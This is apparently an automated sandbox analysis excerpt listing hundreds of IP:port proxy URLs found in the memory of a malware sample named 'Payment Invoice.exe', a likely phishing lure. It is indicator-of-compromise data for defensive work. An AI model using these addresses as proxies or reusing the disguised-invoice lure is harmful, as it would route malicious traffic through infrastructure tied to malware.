                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163171C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.255.45.67:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.255.45.67:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.255.86.226:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.255.86.226:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.5.73.71:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.5.73.71:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.99.148.90:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.99.148.90:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.99.244.154
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.99.244.154://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://139.99.244.154:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.103.24.1
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.103.24.148:8000
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.103.24.148:8000://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317148000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.103.24.20:8000
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317148000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.103.24.20:8000://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.103.26.53:8000
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.103.26.53:8000://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.116.188.182:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.116.188.182:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.142.36.210
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.142.36.210://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.142.36.210:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.143.130.210
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.143.130.210://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.143.130.210:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.143.172.238:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.143.172.238:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.161.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.161.17.4:4153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.161.17.4:4153://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631816E000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317D8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.207.167.114:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317D8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.207.167.114:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.207.206.223:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.207.206.223:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.207.206.27:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.207.206.27:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.207.24.176:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.207.24.176:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316B87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.207.41.71:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316B87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.207.41.71:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.225.254.128:5555
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.225.254.128:5555://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.232.160.247:10801://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.232.235.13:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.232.235.13:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.47.70.137:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.56.98.15:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://14.56.98.15:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://140.227.204
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://140.227.204.70:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://140.227.204.70:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://140.250.150.56:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://140.250.150.56:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://140.82.35.234:44444
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://140.82.35.234:44444://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://140.83.32.175
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://140.83.32.175://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://140.83.32.175:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.147.33.121
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.147.33.121://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.147.33.121:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.95.160.178:5870
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://141.95.160.178:5870://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.11.222.22
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.11.222.22://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.11.222.22:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.147.114.50:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.147.114.50:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319699000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.000001631967C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.4.7.20:10722
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319699000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.4.7.20:10722://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.4.7.20:43100
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.4.7.20:43100://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.54.229.249:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.54.229.249:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.54.231.38:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.54.231.38:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.54.232.6:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.54.232.6:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.54.235.9:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.54.235.9:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.54.236.97:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.54.236.97:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.54.237.34:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://142.54.237.34:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.137.116.72:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.137.116.72:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.198.226.25
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.198.226.25://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.198.226.25:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.202.97.171:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.202.97.171:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.208.152
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.208.152.61:3180
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.208.152.61:3180://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.255.140.28:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.255.140.28:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.255.179.129:4153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.255.179.129:4153://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.44.191.108:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317A6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.44.191.108:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.64.8.21:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://143.64.8.21:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://144.24.122.46
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://144.24.122.46://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://144.24.122.46:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://144.76.96.180:5566
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://144.76.96.180:5566://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631959C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://144.76.96.180:5566x
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://144.91.118.176:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://144.91.118.176:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://145.239.199.109:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://145.239.199.109:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.120.160.148:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.120.160.148:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.19.106.193:12334
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.19.106.193:12334://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.19.106.194:12334
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.19.106.194:12334://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.19.106.217:12334
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.19.106.217:12334://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.19.106.42:12334
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163197D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.19.106.42:12334://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631736E000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163170E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.190.51.181:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631734B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.190.51.181:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631676A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.56.146.5:48384
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.56.146.5:48384://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.147.11:62801
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.147.11:62801://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.18.246:25810
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.18.246:25810://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.18.246:40975
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.18.246:40975://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.18.246:49871
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.18.246:49871://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.202.70
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.202.70://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.202.70:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.243.214
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163184EE000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.70.29:6147
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.70.29:6147://proxyx
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.70.29:8446
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.59.70.29:8446://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316AAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.70.80.76
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.70.80.76://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://146.70.80.76:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.124.212
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163170E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.124.212.31:11070
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163170E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.124.212.31:11070://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.124.212.31:13276
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.124.212.31:13276://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.124.212.31:16844
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.124.212.31:16844://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.124.212.31:36779
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.124.212.31:36779://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631737F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.124.212.31:51825
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.139.133.15:61524
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.139.133.15:61524://proxy8
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.182.180.242
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.182.180.242://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.182.180.242:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.28.145.213:10002
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.28.145.213:10002://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317148000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.75.34.83:10006
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.75.34.83:10006://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.75.34.85
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.75.34.85://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.75.34.85:10007
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.75.34.85:10007://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.75.34.85:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317D20000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317D6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.75.34.86:10000
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317D3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.75.34.86:10000://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.75.34.86:10003
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.75.34.86:10003://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E25000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319890000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.75.34.86:10007
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163198A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.75.34.86:10007://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.75.92.244:9401
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.75.92.244:9401://proxy
